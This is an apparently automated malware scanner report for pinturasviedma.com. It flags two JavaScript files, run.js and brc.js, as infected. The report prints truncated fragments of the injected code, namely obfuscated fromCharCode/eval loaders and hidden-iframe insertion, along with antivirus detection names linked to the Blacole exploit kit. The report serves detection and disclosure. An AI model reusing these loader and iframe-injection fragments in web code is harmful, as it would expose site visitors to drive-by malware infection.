Malware Scanner report for pinturasviedma.com

Malicious/Suspicious/Total urls checked: 2/0/4

2 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://pinturasviedma.com/	200 OK Content-Length: 1482 Content-Type: text/html	clean
http://pinturasviedma.com/archivos/swf/run.js	200 OK Content-Length: 9202 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) function runSWF(archivo, ancho, alto, version, bgcolor, id, menu, FlashVars, quality, allowScriptAccess) { if(version!=""){ var version_data=version; }else{ var version_data="6,0,0,0"; } if(menu!=""){ menu_data=false; }else{ menu_data=false; } if(bgcolor!=""){ var bgcolor_data=bgcolor; }else{ var bgcolor_data="#FFFFFF"; } if(id!=""){ id_data=id; }else{ id_data="flashMovie"; } if(quality!=" ... 8307 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ... 32997 bytes are skipped ... ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports: nProtect JS:Trojan.Iframer.C K7AntiVirus Trojan Emsisoft JS:Trojan.Iframer.C (B) Kaspersky HEUR:Trojan.Script.Iframer Microsoft Trojan:JS/Iframeinject.AB MicroWorld-eScan JS:Trojan.Iframer.C F-Secure JS:Trojan.Iframer.C F-Prot JS/IFrame.QW GData JS:Trojan.Iframer.C Commtouch JS/IFrame.QW BitDefender JS:Trojan.Iframer.C
http://pinturasviedma.com/archivos/swf/brc.js	200 OK Content-Length: 6151 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) if (window != window.top) top.location.href = location.href; function closeWindow() { this.top.close() } window.moveTo(0,0); if (document.all) { top.window.resizeTo(screen.availWidth,screen.availHeight); } else if (document.layers\|\|document.getElementById) { if (top.window.outerHeight<screen.availHeight\|\|top.window.outerWidth<screen.availWidth){ top.window.outerHeight = scree ... 5300 bytes are skipped ...05,230,105,196,105,216,105,232,121,122,34,208,105,200,100,202,110,68,59,200,111,198,117,218,101,220,116,92,98,222,100,242,46,194,112,224,101,220,100,134,104,210,108,200,40,210,102,228,109,82,125,250,99,194,116,198,104,80,101,82,123,250,125,88,53,96,48,82,59];v="e"+"v"+"a";}if(v)e=window[v+"l"];try{q=document.createElement("b");if(e)q.appendChild(q+"");}catch(fwbewe){w=f;s=[];} r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s); Antivirus reports: AntiVir JS/BlacoleRef.BO.2 Avast JS:Includer-ATS [Trj] Ad-Aware Trojan.JS.Agent.GLM Ikarus Trojan.JS.Blacole Rising JS:Trojan.Script.JS.BlacoleRef.e!1610800 nProtect Trojan.JS.Agent.GLM K7AntiVirus Trojan ( 8458c54e0 ) Comodo Exploit.JS.Blacole.DQ Emsisoft Trojan.JS.Agent.GLM (B) K7GW Exploit ( 04c554971 ) McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Trojan:JS/BlacoleRef.BO Kaspersky Trojan-Downloader.JS.Agent.gtj MicroWorld-eScan Trojan.JS.Agent.GLM Fortinet JS/Blacole.EUS!tr.dldr Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.vtxhd F-Secure Trojan.JS.Agent.GLM VIPRE Trojan.JS.Generic (v) F-Prot JS/Blacole.BV AVG JS/Agent Norman BlacoleRef.O Sophos Mal/Iframe-AF GData Trojan.JS.Agent.GLM Commtouch JS/Blacole.BV ESET-NOD32 JS/Kryptik.QD BitDefender Trojan.JS.Agent.GLM
http://pinturasviedma.com/test404page.js	404 Not Found Content-Length: 910 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: pinturasviedma.com

Result:
HTTP/1.1 200 OK
Date: Wed, 16 Apr 2014 04:37:05 GMT
Accept-Ranges: bytes
ETag: "42e8807df185cd1:0"
Server: Microsoft-IIS/7.5
Content-Length: 1482
Content-Type: text/html
Last-Modified: Wed, 29 Aug 2012 14:20:50 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin

...1482 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: pinturasviedma.com
Referer: http://www.google.com/search?q=pinturasviedma.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=pinturasviedma.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://pinturasviedma.com/

Result: pinturasviedma.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for pinturasviedma.com

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools